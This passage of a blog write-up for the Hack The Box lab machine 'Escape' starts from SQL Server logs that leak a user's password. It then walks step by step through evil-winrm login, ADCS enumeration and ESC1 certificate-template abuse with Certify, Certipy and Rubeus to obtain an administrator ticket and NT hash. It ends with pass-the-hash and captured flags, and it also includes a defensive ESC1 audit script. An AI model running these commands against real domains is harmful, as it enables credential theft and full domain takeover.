2022-11-18 13:43:06.88 spid18s SQL Server is now ready for client connections. This is an informational message; no user action is required.
2022-11-18 13:43:06.88 Server SQL Server is attempting to register a Service Principal Name (SPN) for the SQL Server service. Kerberos authentication will not be possible until a SPN is registered for the SQL Server service. This is an informational message. No user action is required.
2022-11-18 13:43:06.88 spid14s Database 'model' running the upgrade step from version 900 to version 901.
2022-11-18 13:43:06.89 Server The SQL Server Network Interface library could not register the Service Principal Name (SPN) [ MSSQLSvc/dc.sequel.htb:SQLMOCK ] for the SQL Server service. Windows return code: 0x2098, state: 15. Failure to register a SPN might cause integrated authentication to use NTLM instead of Kerberos. This is an informational message. Further action is only required if Kerberos authentication is required by authentication policies and if the SPN has not been manually registered.
2022-11-18 13:43:06.89 spid14s Database 'model' running the upgrade step from version 901 to version 902.
2022-11-18 13:43:06.89 spid14s Database 'model' running the upgrade step from version 902 to version 903.
2022-11-18 13:43:06.89 spid14s Database 'model' running the upgrade step from version 903 to version 904.
2022-11-18 13:43:07.00 spid14s Clearing tempdb database.
2022-11-18 13:43:07.06 spid14s Starting up database 'tempdb'.
2022-11-18 13:43:07.17 spid9s Database 'msdb' running the upgrade step from version 902 to version 903.
2022-11-18 13:43:07.17 spid9s Database 'msdb' running the upgrade step from version 903 to version 904.
2022-11-18 13:43:07.29 spid9s Recovery is complete. This is an informational message only. No user action is required.
2022-11-18 13:43:07.30 spid51 Changed database context to 'master'.
2022-11-18 13:43:07.30 spid51 Changed language setting to us_english.
2022-11-18 13:43:07.33 spid51 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.34 spid51 Configuration option 'default language' changed from 0 to 0. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.34 spid51 Configuration option 'default full-text language' changed from 1033 to 1033. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.34 spid51 Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.39 spid51 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.39 spid51 Configuration option 'user instances enabled' changed from 1 to 1. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.39 spid51 Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.44 spid51 Changed database context to 'master'.
2022-11-18 13:43:07.44 spid51 Changed language setting to us_english.
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:43:07.76 spid51 Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required.
2022-11-18 13:43:08.24 spid51 Changed database context to 'master'.
2022-11-18 13:43:08.24 spid51 Changed language setting to us_english.
2022-11-18 13:43:09.29 spid9s SQL Server is terminating in response to a 'stop' request from Service Control Manager. This is an informational message only. No user action is required.
2022-11-18 13:43:09.31 spid9s .NET Framework runtime has been stopped.
2022-11-18 13:43:09.43 spid9s SQL Trace was stopped due to server shutdown. Trace ID = '1'. This is an informational message only; no user action is required.

15. Another user's account and password turned up in this file, so try logging in with them directly and grab the flag.

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p 'NuclearMosquito3'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> ls


Directory: C:\Users\Ryan.Cooper\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/22/2024 1:30 PM 34 user.txt


*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> cat user.txt
eb527cd5d75d332b9b106092b84fc354
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>

0x02 Obtaining system privileges

16. Start enumerating inside the domain environment.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> net time /domain
Current time at \\dc.sequel.htb is 4/22/2024 2:45:21 PM

The command completed successfully.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>


*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> net user Ryan.Cooper
User name Ryan.Cooper
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2/1/2023 2:52:57 PM
Password expires Never
Password changeable 2/2/2023 2:52:57 PM
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/7/2023 10:13:56 AM

Logon hours allowed All

Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>

17. Honestly, I did not find anything here; this hit a blind spot in my knowledge, so I consulted the walkthrough.

18. One thing that always needs enumerating on a Windows domain is whether Active Directory Certificate Services (ADCS) is present. A quick way to check is crackmapexec (it works as either the sql_svc or the Ryan.Cooper user):

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec ldap 10.10.11.202 -u ryan.cooper -p NuclearMosquito3 -M adcs
SMB 10.10.11.202 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.11.202 636 DC [+] sequel.htb\ryan.cooper:NuclearMosquito3
ADCS Found PKI Enrollment Server: dc.sequel.htb
ADCS Found CN: sequel-DC-CA

19. Identify vulnerable templates. With ADCS running, the next question is whether any of its certificate templates are configured insecurely. To enumerate further, download Certify from SharpCollection and upload it to Escape:

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> upload /home/kali/Desktop/tools/Certify.exe

Info: Uploading /home/kali/Desktop/tools/Certify.exe to C:\Users\Ryan.Cooper\Desktop\Certify.exe

Data: 236884 bytes of 236884 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>

20. Certify's README explains how to enumerate and abuse certificate services. The first step it shows is running Certify.exe find /vulnerable; by default this checks against the standard low-privileged groups, and adding /currentuser checks the current user's groups instead. Either way works. After printing some information about the enterprise CA, it lists one vulnerable certificate template:

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe find /vulnerable /currentuser

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0

[*] Action: Find certificate templates
[*] Using current user's unrolled group SIDs for vulnerability checks.
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544

Access Rights Principal

Allow Enroll NT AUTHORITY\Authenticated Users S-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519



Certify completed in 00:00:09.9605849
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>

21. The danger here is that sequel\Domain Users has enrollment rights on the template (this is scenario 3 in the Certify README).

https://github.com/ly4k/Certipy

https://book.hacktricks.xyz/v/cn/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation

22. Abusing the template, method 1: certipy. It confirms that a vulnerable template named UserAuthentication exists. In particular, Authenticated Users can enroll in this template, and because msPKI-Certificate-Name-Flag is present and contains ENROLLEE_SUPPLIES_SUBJECT, the template is vulnerable to the attack described in "Investigating Certificate Template Enrollment Attacks (ADCS)". Essentially, this lets anyone enroll in the template and specify an arbitrary subject alternative name, which means this attack path can be used to authenticate as a domain administrator. To exploit it, use certipy:

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.202 dc.sequel.htb sequel.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.202 dc.sequel.htb sequel.htb

┌──(kali㉿offsec)-[~/Desktop]
└─$ ntpdate -u dc.sequel.htb
2024-04-25 04:47:10.603853 (+0800) +229.172548 +/- 0.062410 dc.sequel.htb 10.10.11.202 s1 no-leap
CLOCK: step_systime: Operation not permitted

┌──(kali㉿offsec)-[~/Desktop]
└─$ certipy-ad req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -target sequel.htb -ca sequel-DC-CA -template UserAuthentication
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
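As an added example (not from this writeup or from Certipy), the following defender-side audit reads one template block in the text layout that certipy find -text -stdout prints and flags the ESC1 combination described above: a low-privileged group with Enroll, enrollee-supplied subject, a client-authentication EKU, no manager approval and no required signatures. The sample block is constructed from the UserAuthentication template on this box; the parser and the LOW_PRIV_GROUPS list are my own assumptions.

```python
# Added example (not from this writeup or from Certipy): audit one certificate
# template block, as printed by `certipy find -text -stdout`, for ESC1.
# Assumptions: the "Key : Value" layout of Certipy's text output and the
# LOW_PRIV_GROUPS list below are mine, not the tool's.
import re
from typing import Dict, List

# Principals that should never hold Enroll on a template that lets the enrollee
# supply the subject and is valid for client authentication.
LOW_PRIV_GROUPS = ("Domain Users", "Authenticated Users", "Domain Computers",
                   "Everyone", "Users")
SECTION_HEADERS = {"Permissions", "Enrollment Permissions",
                   "Object Control Permissions"}

# Constructed sample, modelled on the UserAuthentication template from the box.
VULNERABLE_TEMPLATE = r"""
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Enabled                             : True
    Client Authentication               : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Domain Users
                                          SEQUEL.HTB\Enterprise Admins
"""
# Same template with one remediation applied: CA manager approval required.
HARDENED_TEMPLATE = re.sub(r"(Requires Manager Approval\s+: )False",
                           r"\1True", VULNERABLE_TEMPLATE)


def parse_template(text: str) -> Dict[str, List[str]]:
    """Turn "Key : Value" lines into {key: [values]}; a line without a colon
    continues the previous key (Certipy wraps multi-valued fields that way)."""
    fields: Dict[str, List[str]] = {}
    last_key = None
    for raw in text.splitlines():
        line = raw.strip()
        if (not line or line.isdigit() or line.startswith("[")
                or line in SECTION_HEADERS):
            continue
        if " : " in line:
            key, value = line.split(" : ", 1)
            last_key = key.strip()
            fields[last_key] = [value.strip()]
        elif last_key is not None:
            fields[last_key].append(line)
    return fields


def esc1_findings(fields: Dict[str, List[str]]) -> List[str]:
    """Return the low-privileged principals that make the template ESC1-exposed,
    or [] when any precondition is missing."""
    def flag(name: str) -> bool:
        return fields.get(name, ["False"])[0].lower() == "true"
    if not flag("Enabled") or not flag("Enrollee Supplies Subject"):
        return []
    if not (flag("Client Authentication") or flag("Any Purpose")):
        return []
    if (flag("Requires Manager Approval")
            or fields.get("Authorized Signatures Required", ["0"])[0] != "0"):
        return []
    return [p for p in fields.get("Enrollment Rights", [])
            if p.split("\\", 1)[-1] in LOW_PRIV_GROUPS]


if __name__ == "__main__":
    for name, text in (("vulnerable", VULNERABLE_TEMPLATE),
                       ("hardened", HARDENED_TEMPLATE)):
        print(name, esc1_findings(parse_template(text)))
```

Removing Domain Users from Enrollment Rights, or clearing the enrollee-supplies-subject flag, closes the finding the same way manager approval does.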

23. Now that we have a certificate for administrator, certipy can be used again to obtain a Ticket Granting Ticket (TGT) and extract that user's NT hash. Because this step involves Kerberos, the local clock has to be synchronised with the remote machine before continuing.

┌──(kali㉿offsec)-[~/Desktop]
└─$ certipy-ad auth -pfx administrator.pfx
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

24. There is a problem with the certificate here and the target account's hash cannot be retrieved, so let's switch methods.

25. Continuing with README scenario 3, next run Certify.exe to request a certificate with administrator as the alternative name. It returns a cert.pem:

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0

[*] Action: Request a Certificates

[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : administrator

[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA

[*] CA Response : The certificate had been issued.
[*] Request ID : 15

[*] cert.pem :



[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:19.7676051
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>

26. Save the key material above into a cert.pem file; both the README and the end of the output show the next step. Copy everything from -----BEGIN RSA PRIVATE KEY----- through -----END CERTIFICATE----- into a file on the Kali host and convert it to a .pfx with the given command, entering no password when prompted:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
[sudo] kali 的密码:
Enter Export Password:
Verifying - Enter Export Password:

27. For some reason, the certificate generated on my Kali machine has a problem and cannot be used.

shiyan@InfoSec Desktop % openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
shiyan@InfoSec Desktop %

28. Upload cert.pfx and Rubeus.exe (Rubeus is downloaded from SharpCollection), then run the asktgt command, passing it the certificate to obtain a TGT as administrator:

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> upload /home/kali/Desktop/cert.pfx

Info: Uploading /home/kali/Desktop/cert.pfx to C:\Users\Ryan.Cooper\Desktop\cert.pfx

Data: 4564 bytes of 4564 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> upload /home/kali/Desktop/tools/Ru
/home/kali/Desktop/tools/Rubeus /home/kali/Desktop/tools/RunasCs
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> upload /home/kali/Desktop/tools/Rubeus/Rubeus.exe

Info: Uploading /home/kali/Desktop/tools/Rubeus/Rubeus.exe to C:\Users\Ryan.Cooper\Desktop\Rubeus.exe

Data: 369320 bytes of 369320 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>

.\Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Ryan.Cooper\Desktop\cert.pfx

29. This did not work; the certificates generated on my Kali machine and on my MacBook both have problems, so below we finish this step from the HTB virtual machine.

30. It feels like a problem with the target machine; let's reset it and see....

31. Continuing to follow the walkthrough, start the operation:

*Evil-WinRM* PS C:\> cd programdata
*Evil-WinRM* PS C:\programdata> ls


Directory: C:\programdata


Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 11/19/2022 3:45 AM Microsoft
d----- 2/6/2023 12:09 PM Package Cache
d----- 2/6/2023 2:52 PM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 2/2/2023 1:13 PM ssh
d----- 7/20/2021 12:22 PM USOPrivate
d----- 7/20/2021 12:22 PM USOShared
d----- 7/20/2021 12:27 PM VMware


*Evil-WinRM* PS C:\programdata> upload /home/kali/Desktop/tools/Certify.exe

Info: Uploading /home/kali/Desktop/tools/Certify.exe to C:\programdata\Certify.exe

Data: 236884 bytes of 236884 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\programdata> upload /home/kali/Desktop/tools/Rubeus/Rubeus.exe

Info: Uploading /home/kali/Desktop/tools/Rubeus/Rubeus.exe to C:\programdata\Rubeus.exe

Data: 369320 bytes of 369320 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\programdata> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0

[*] Action: Request a Certificates

[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : administrator

[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA

[*] CA Response : The certificate had been issued.
[*] Request ID : 13

[*] cert.pem :



[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:13.8547393
*Evil-WinRM* PS C:\programdata> upload /home/kali/Desktop/cert.pfx

Info: Uploading /home/kali/Desktop/cert.pfx to C:\programdata\cert.pfx

Data: 4564 bytes of 4564 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\programdata> .\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\cert.pfx

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.4

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):


ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : administrator
UserRealm : SEQUEL.HTB
StartTime : 4/24/2024 3:00:41 PM
EndTime : 4/25/2024 1:00:41 AM
RenewTill : 5/1/2024 3:00:41 PM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : R9GqamjgZB+FV/y7BFpUig==

32. It worked! Rubeus tries to load the returned ticket directly into the current session, so in theory once I run this command I could go into the administrator's folder and grab the flag. However, that does not work over Evil-WinRM. Instead, I will run the same command with /getcredentials /show /nowrap, which does the same thing and additionally tries to dump credential information about the account:

*Evil-WinRM* PS C:\programdata> .\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\cert.pfx /getcredentials /show /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.4

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):


ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : administrator
UserRealm : SEQUEL.HTB
StartTime : 4/24/2024 3:00:58 PM
EndTime : 4/25/2024 1:00:58 AM
RenewTill : 5/1/2024 3:00:58 PM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : JzxniF0gg1XFlXNcrceOPg==

*Evil-WinRM* PS C:\programdata>

33. Ugh, the NTLM hash should by rights appear here, but it just doesn't......

34. Never mind; just follow the walkthrough and grab the flag first.

┌─[sg-vip-2]─[10.10.14.18]─[shiyan@htb-x9ixubxjci]─[~/Desktop]
└──╼ [★]$ evil-winrm -i sequel.htb -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
f875c34763d0a4f81e961812f2c5b01f
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Note: adding the steps that finally succeeded (following 0xdf's commands worked).

┌──(kali㉿offsec)-[~/Desktop]
└─$ certipy-ad find -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
Certificate Subject : CN=sequel-DC-CA, DC=sequel, DC=htb
Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101
Certificate Validity Start : 2022-11-18 20:58:46+00:00
Certificate Validity End : 2121-11-18 21:08:46+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication

┌──(kali㉿offsec)-[~/Desktop]
└─$ certipy-ad req -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 14
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

┌──(kali㉿offsec)-[~/Desktop]
└─$ certipy-ad auth -pfx administrator.pfx
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

0x03 Proof of completion

https://www.hackthebox.com/achievement/machine/1705469/531


Escape-htb-writeup
https://sh1yan.top/2024/04/21/Escape-htb-writeup/
Author
shiyan
Published on
April 21, 2024
License